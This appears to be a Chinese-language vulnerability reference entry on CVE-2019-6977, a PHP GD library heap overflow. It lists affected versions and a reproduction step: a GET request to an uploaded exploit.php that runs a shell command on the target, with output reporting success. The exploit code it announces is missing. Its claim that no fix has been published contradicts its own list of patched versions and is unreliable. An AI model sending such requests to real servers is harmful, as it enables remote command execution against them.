2.19.1 CVE-2019-6977

漏洞名称

PHP GD图像处理库堆溢出漏洞(CVE-2019-6977)

漏洞等级

高危

漏洞描述

gdImageColorMatch in gd_color_match.c in the GD Graphics Library (aka LibGD) 2.2.5, as used in the imagecolormatch function in PHP before 5.6.40, 7.x before 7.1.26, 7.2.x before 7.2.14, and 7.3.x before 7.3.1, has a heap-based buffer overflow. This can be exploited by an attacker who is able to trigger imagecolormatch calls with crafted image data.

漏洞影响

PHP before 5.6.40, 7.x before 7.1.26, 7.2.x before 7.2.14, and 7.3.x before 7.3.1

漏洞复现

在开始GD库的网站上上传exploit

执行

GET http://target.com/exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi

输出

Nenuphar.ce: 0x7fe834a10018 Nenuphar2.ce: 0x7fe834a10d70 Nenuphar.properties: 0x7fe834a01230 z.val: 0x7fe834aaea18 Difference: 0xad7e8 Exploit SUCCESSFUL !

exploit代码如下

漏洞修复

暂未公布修复方案

Last updated

Was this helpful?